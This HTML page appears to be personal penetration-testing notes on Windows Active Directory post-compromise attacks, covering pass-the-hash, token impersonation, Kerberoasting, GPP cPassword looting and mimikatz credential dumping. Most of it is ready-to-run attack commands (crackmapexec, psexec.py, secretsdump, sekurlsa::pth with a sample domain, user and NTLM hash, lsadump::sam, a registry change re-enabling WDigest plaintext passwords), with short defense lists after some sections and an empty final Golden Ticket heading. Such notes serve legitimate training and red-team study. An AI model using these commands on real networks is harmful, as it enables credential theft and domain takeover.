<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Post-Compromise Attacks</title>
</head><body><b><span style="font-size: 13pt">========================================================<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Pass The Hash all around the local Network<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;[Just Applicable for NTLM not NTLMv2]<br/>
</span></b><b><span style="font-size: 13pt">========================================================</span></b><span style="font-size: 11pt"><br/>
</span>crackmapexec &lt;ip/CIDR&gt; -u &lt;user&gt; -H &lt;Hash&gt; --local-auth<br/>
<br/>
privilege::debug<br/>
sekurlsa::pth /user:OneEmran /domain:eastnets.com /ntlm:d54369f318cd552cd9756bb06477f806<br/>
<br/>
<b>Note: </b>The Hash used is the second Half of the hash dumped<br/>
<br/>
<br/>
<b>========================================================<br/>
<span style="font-size: 11pt">Pass The Password all around the local Network:<br/>
</span></b><b><span style="font-size: 11pt">==================================================</span></b><br/>
psexec.py &lt;user&gt;:@IP -hashes LMHASH:NTHASH<br/>
<br/>
crackmapexec &lt;ip/CIDR&gt; -u &lt;user&gt; -d &lt;domain&gt; -p &lt;pass&gt;<br/>
<br/>
<br/>
<b>========================================================<br/>
Dumping Hashes with Secretdump.py<span style="font-size: 11pt">:<br/>
</span><span style="font-size: 11pt">==================================================<br/>
</span></b>Secretdump.py domain/user:PASSWORD@IP<br/>
<br/>
<br/>
<br/>
<b>========================================================<br/>
Crcking NTLM Hashes<span style="font-size: 11pt">:<br/>
</span><span style="font-size: 11pt">==================================================<br/>
</span></b>hashcat.exe -m 1000 hashes_file.txt wordlist.txt -O <br/>
<br/>
<br/>
<b>========================================================<br/>
Defesnse:<span style="font-size: 11pt"><br/>
</span><span style="font-size: 11pt">==================================================<br/>
1- Limit account reuse<br/>
</span></b><span style="font-size: 10pt">- Avoid reusing local admin password<br/>
- Disable Guest and Administrator accounts<br/>
- Limit who is a local administrator (Least Privilege)<br/>
<br/>
<b>2-Privilege Access Managment(PAM)</b><br/>
</span>- Check out/in sensitive accounts when needed<br/>
- Automatically rotate passwords on check out and check in<br/>
- Limits pass attacks as hash/password is strong constantly rotated<br/>
<br/>
<br/>
<br/>
<b><span style="font-size: 13pt">========================================================<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Token Impersonation<br/>
========================================================<br/>
</span><span style="font-size: 11pt">Tokens:</span><span style="font-size: 13pt"><br/>
</span></b><span style="font-size: 12pt">Temporary keys that allow you to access a system/network without having to provide credentials each time you access a file.<br/>
</span><span style="font-size: 12pt">Tokens will be available until the system being rebooted.</span><b><span style="font-size: 13pt"><br/>
</span></b><b><span style="font-size: 13pt"><br/>
</span><span style="font-size: 11pt">Tokens types:</span><span style="font-size: 13pt"><br/>
</span></b><b><span style="font-size: 12pt">- </span><span style="font-size: 11pt">Delegate:</span></b><span style="font-size: 12pt">&nbsp;created for logging into a machine or using Remote Desktop<br/>
</span><span style="font-size: 12pt"><b>-</b></span><b><span style="font-size: 11pt">&nbsp;Impersonate: </span></b><span style="font-size: 12pt">"non-interactive" such as attaching a network drive or a domain logon script<br/>
</span><span style="font-size: 12pt"><br/>
</span><span style="font-size: 12pt"><u>If we navigated to a machine have a Token of Domain Admin that we can impersonate, then we have a Domain admin privilege</u></span><span style="font-size: 13pt"><br/>
</span><span style="font-size: 13pt"><br/>
<br/>
<u><b>Token Impersonation:</b><br/>
</u>load incognito<br/>
list_tokens -u<br/>
impersonate_token eastnets\\aalmajali <br/>
shell<br/>
</span><span style="font-size: 13pt">Invoke-mimikatz hash dump command &nbsp;</span><span style="font-size: 10pt"><b>&nbsp;<br/>
</b></span><span style="font-size: 10pt"><b><br/>
</b><b>IF we have meterpreter session: </b>execute -f cmd -H -c -i -t<b><br/>
</b><b><br/>
<u>[If aalmajali is domain admin, then we will have all domain hashes and kerberos TGT tickets]</u><br/>
</b></span><b>[rev2self] <u>command in meterpreter return you to the last privilege if you skiped from it by erorrv <br/>
</u><u><span style="font-size: 13pt"><br/>
</span></u><span style="font-size: 13pt"><br/>
<u>Defenses:</u><br/>
</span></b><span style="font-size: 11pt">- Limit user/group token creation permisions<br/>
- Acoount tiering<br/>
</span><span style="font-size: 11pt">- Local admin restriction</span><span style="font-size: 13pt"><br/>
</span><span style="font-size: 13pt"><b><br/>
<br/>
===================================================<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Kerberoasting<br/>
===================================================<br/>
</b><b>Goal of kerbroasting: </b>Get TGS and decrypt server's account hash<b><br/>
</b><b><br/>
</b><b>Client &nbsp;</b>&nbsp;request TGT [providing NTLM] &gt;<b>&nbsp; DC<br/>
</b><b>Client &lt;</b>&nbsp;receiving TGT with krbtgt hash<b>&nbsp; DC<br/>
</b><b>Client &nbsp;</b>request TGS for Server (Presnt TGT] &gt;<b>&nbsp; DC<br/>
</b><b>Client &lt; </b>receiving TGS encrypted with server's account hash <b>&nbsp; DC<br/>
</b><b><br/>
<br/>
Get SPN's, Dump Hash<br/>
</b>python GetUserSPNs.py &lt;Domain/username:password&gt; -dc-ip &lt;DC_IP&gt; -request<br/>
<br/>
hashcat -m 13100 kerberoast.txt rockyou.txt -O<br/>
<br/>
<b>Defesnses:</b><br/>
1- Strong passwords for service accounts<br/>
2- Least privileges<br/>
<b><br/>
<br/>
===================================================<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;GPP cPassword Attack<br/>
===================================================<br/>
Group Policy Preferences:<br/>
</b>MS14-025<br/>
<br/>
&gt; Group Policy prefernces allowed admins to create policies using embedded credentials<br/>
&gt; These credentials were encrypted and placed in a "cPassword"<br/>
&gt; The key was accidentally released<br/>
&gt; Patched in MS14-025, but doesnt prevent previous uses<b><br/>
</b><b><br/>
Try to connect:<br/>
</b>smbclient -L \\\\DC_IP\\ --user=aalmajali<br/>
smbclient &nbsp;\\\\DC_IP\\share_name --user=aalmajali<br/>
prompt off<br/>
recurse on<br/>
mget *<br/>
<br/>
<br/>
<b>===================================================<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dumping hashes Mimikatz<br/>
===================================================<br/>
</b><b>LSA:</b>&nbsp;local security authority<br/>
<b><br/>
</b><b>Hashes dump:</b><br/>
privilege::debug<br/>
sekurlsa::logonpasswords<br/>
<br/>
<b>Dumping sam:</b><br/>
lsadump::sam<br/>
or<br/>
lsadump::sam /patch<br/>
or<br/>
lsadump::lsa /patch<br/>
--------------------------------------------------------------------------------------<br/>
<b>wdigest: </b>feature on windows 7 and before was storing passwords<br/>
and enabled by default <br/>
<br/>
<b>Turning wdigest on :<br/>
</b>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1<b><br/>
</b><b><br/>
===================================================<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Golden Ticket / Pass the ticket Attacks<br/>
===================================================<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
</b></span>&nbsp;</body></html>